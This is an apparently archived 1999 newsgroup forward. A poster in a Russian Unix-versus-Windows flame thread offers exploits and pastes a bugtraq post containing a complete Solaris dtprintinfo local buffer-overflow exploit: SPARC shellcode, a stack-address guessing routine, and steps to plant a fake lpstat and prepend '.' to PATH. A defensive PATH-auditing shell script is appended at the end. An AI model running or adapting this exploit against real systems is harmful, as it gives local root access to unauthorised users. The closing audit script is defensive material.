(fwd) Re: "Unix way"

Andrey Gerzhov (kittle@freeland.alex-ua.com)
Sat, 10 Jul 1999 18:53:02 +0300 (EEST)

-- forwarded message --
Path: freeland.alex-ua.com!routki.ki.yurteh.net!carrier.kiev.ua!srcc!Gamma.RU!ddt.demos.su!f400.n5020!f238.n5020!f204.n5020!f1666.n5020!news.simcb.ru!not-for-mail
Newsgroups: fido7.ru.os.cmp
Distribution: fido7
X-Comment-To: xr@anna.npi.msu.su
Approved: gateway@fido7.ru
From: john gladkih <john@gate.simcb.ru>
X-FTN-Sender: john gladkih <john.gladkih@f1666.n5020.z2.fidonet.org>
Date: Thu, 08 Jul 99 18:20:34 +0400
Subject: Re: "Unix way"
Message-ID: <7m2fk2$8v7$2@gate.simcb.ru>
References: <1770583504@gate.simcb.ru> <3784A025.1425A18@anna.npi.msu.su>
Organization: Gates to Hell
X-FTN-AREA: RU.OS.CMP
X-FTN-MSGID: gate.simcb.ru ae8df066
X-FTN-REPLY: anna.npi.msu.su 0d3946ba
X-FTN-REPLYADDR: john@gate.simcb.ru
X-FTN-REPLYTO: 2:5020/1666@fidonet UUCP
NNTP-Posting-Date: 8 Jul 1999 15:20:34 GMT
X-FTN-Tearline: ifmail v.2.14.os-p2
X-FTN-Origin: Gates to Hell (2:5020/1666@fidonet)
X-FTN-SEEN-BY: 50/993 450/102 461/640 462/30 463/68 159 207 464/34 465/110 478/25
X-FTN-SEEN-BY: 4614/1 4615/21 4631/13 4635/4 5000/44 76 5001/15 17 5002/16 5002
X-FTN-SEEN-BY: 5003/15 5004/16 5005/5005 5010/77 148 5011/13 201 5014/4 5015/4
X-FTN-SEEN-BY: 5020/10 37 52 69 79 104 128 169 194 204 238 278 362 400 758 870
X-FTN-SEEN-BY: 5020/1100 1169 1381 1666 1851 1978 5021/11 5023/1 8 11 5025/2
X-FTN-SEEN-BY: 5027/16 5028/51 5029/1 5030/23 115 239 251 818 5033/4 5035/10
X-FTN-SEEN-BY: 5040/47 5042/8 5045/7 5049/256 5050/5050 5051/1 16 5053/16 5055/92
X-FTN-SEEN-BY: 5057/1 5058/24 1000 5059/10 5060/9 5061/15 5063/1 27 5066/18 5068/5
X-FTN-SEEN-BY: 5070/66 5075/10 5077/3 28 5078/20 5080/80 5081/3 5083/13 5085/100
X-FTN-SEEN-BY: 5090/2 5095/4 5099/1 5100/8
X-FTN-PATH: 5020/1666 204 238
X-FTN-PATH: 5020/400
Lines: 117
Xref: freeland.alex-ua.com fido7.ru.os.cmp:18286

xr@anna.npi.msu.su wrote:

>> JG??? so can the "unix way" ideology, laid down in the 70s,
>> JG??? be adequate to the technologies of tomorrow?
>>
>> jg?? yes, yes! our Great Future is Windows'2000. what the hell does unix have to do with it?!
>>
>> VR? The existence of an even uglier variant is not an indulgence.
>>
>> what is ugly is unix. Win'2000 is the bright future offered to us by the
>> great company Microsoft.
>>
>> --
>> John, http://www.t.uz, mailto:idu@ku.ru

xanms> NO COMMENT ;)))

xanms> ------- [START ORIGIN ] ----------
xanms> /***
xanms> Kox by Coolio (coolio@k-r4d.com)

which unix do you need exploits for?

From yuuzy@USA.NET Mon May 10 22:21:37 1999
Path: news.simcb.ru!not-for-mail
From: "UNYUN@ShadowPenguin" <yuuzy@USA.NET>
Newsgroups: simcb.netspace.bugtraq
Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits]
Date: 10 May 1999 15:47:37 +0400
Organization: Unknown
Lines: 81
Message-ID: <7h6h0p$hh7$1@gate.simcb.ru>
NNTP-Posting-Host: gate.simcb.ru
X-Trace: gate.simcb.ru 926336857 17960 194.135.97.3 (10 May 1999 11:47:37 GMT)
X-Complaints-To: usenet@simcb.ru
NNTP-Posting-Date: 10 May 1999 11:47:37 GMT
Xref: news.simcb.ru simcb.netspace.bugtraq:155

Sorry, I forgot to write the following things...

Before running the dtprintinfo exploit, please make a dummy
lpstat command.

for example,

% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out

The following exploit program is for Sparc Solaris.
I tested it on Solaris2.6.

/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
=========================================================================
*/
#include <stdio.h>      /* printf */
#include <stdlib.h>     /* putenv */
#include <string.h>     /* strlen */
#include <unistd.h>     /* execl */

#define ADJUST 0            /* leading padding bytes before the filler */
#define OFFSET 1144         /* subtracted from our %sp to guess the target address */
#define STARTADR 724        /* offset of the payload inside x[] */
#define BUFSIZE 900         /* length of the string handed to dtprintinfo -p */
#define NOP 0xa61cc013      /* SPARC instruction used as the filler word */
static char x[1000];
unsigned long ret_adr;
int i;
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

/* Returns the current stack pointer. The value is left in %i0, the SPARC
   return register, so no C return statement follows (it would clobber it).
   Needs gcc on SPARC. */
unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

int main(void)
{
    putenv("LANG=");
    /* ADJUST padding bytes, then the filler word repeated big-endian up to 900 */
    for (i = 0; i < ADJUST; i++) x[i]=0x11;
    for (i = ADJUST; i < 900; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    /* the payload overwrites part of the filler starting at STARTADR */
    for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
    /* the target address is guessed from this process's own stack pointer */
    ret_adr=get_sp()-OFFSET;
    printf("jumping address : %lx\n",ret_adr);
    /* a zero low byte would end the argument string early, so step back */
    if ((ret_adr & 0xff) ==0 ){
        ret_adr -=16;
        printf("New jumping address : %lx\n",ret_adr);
    }
    /* the first 600 bytes are replaced with the guessed address, big-endian */
    for (i = ADJUST; i < 600 ; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >> 8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    x[BUFSIZE]=0;    /* terminate the argument string */
    execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
    return 1;        /* reached only if execl fails */
}

The Shadow Penguin Security
(http://base.oc.to/skyscraper/byte/551)
UNYUN (unewn4th@usa.net)

-- 
John, http://www.t.uz, mailto:idu@ku.ru
-- end of forwarded message --

-- 
With what never hurts,
                                               Kittle
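The forwarded recipe prepends "." to PATH (`setenv PATH .:$PATH`) so that the dummy lpstat in the current directory is the one dtprintinfo finds. The audit below is an added example and is not code from any of the posts above: it walks a PATH string entry by entry and reports the kinds of entry that allow that shadowing. The thread's case is "." at the front; the check generalizes to empty fields (which also mean the current directory), other relative entries, and world-writable absolute directories. The function names and the `RISK <kind> '<entry>'` output format are this example's own conventions.

```shell
#!/bin/sh
# Added example (not from the original posts): audit a PATH string for
# entries that let a caller-controlled directory shadow a system command
# such as lpstat. Function names and the "RISK <kind> '<entry>'" output
# format are this example's own conventions.

# audit_path [PATHSTRING]: print one line per risky entry; audits $PATH
# when no argument is given.
audit_path() {
    # A trailing ':' is appended so the final field is consumed by the loop.
    # Splitting by hand instead of via IFS word splitting keeps empty fields
    # visible, because an empty field is searched as the current directory.
    rest="${1:-$PATH}:"
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            ""|.)
                # "." or an empty field: the current directory is searched,
                # so a same-named file placed there is what gets executed.
                echo "RISK cwd '${entry}'" ;;
            /*)
                # Absolute entry: only a problem if anyone can write to it.
                # -H follows a symlinked entry (e.g. /bin -> usr/bin) so the
                # target directory's mode is tested, not the link's.
                if [ -d "$entry" ] && \
                   [ -n "$(find -H "$entry" -prune -perm -0002 2>/dev/null)" ]; then
                    echo "RISK world-writable '${entry}'"
                fi ;;
            *)
                # Any other relative entry is resolved against the cwd at
                # each exec, which is the same exposure as ".".
                echo "RISK relative '${entry}'" ;;
        esac
    done
}

# path_risk_count [PATHSTRING]: number of findings. awk is used so that
# zero findings still prints "0" and exits 0 (grep -c would exit 1).
path_risk_count() {
    audit_path "$@" | awk 'END { print NR }'
}

# Usage when run directly: list the risky entries of the live PATH, if any.
if [ "$(path_risk_count)" -ne 0 ]; then
    audit_path
fi
```

Run with no argument to audit the invoking shell's PATH, or pass a PATH string (for example one read from a service's environment file) to audit it offline; the world-writable check only fires for directories that exist on the auditing host.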